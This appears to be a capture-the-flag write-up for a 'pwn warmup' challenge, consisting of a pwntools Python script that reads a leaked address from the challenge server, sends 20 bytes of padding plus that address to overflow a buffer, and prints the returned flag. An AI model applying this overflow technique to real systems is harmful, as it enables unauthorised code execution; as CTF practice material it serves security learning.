pwn
pwn warmup
Solved by : thewhiteh4t
#!/usr/bin/python3
from pwn import *
host = 'pwn-warmup.chal.uiuc.tf'
port = 1337
offset = 20
addr = 0
junk = b'A' * offset
conn = remote(host, port)
lines = conn.recvuntil('ad\n').decode().split('\n')
addr = lines[2].split(' = ')[1].strip()
addr = int(addr, 16)
le_num = p64(addr)
buffer = junk + le_num
conn.sendline(buffer)
flag = conn.recvuntil('}').decode()
print(flag)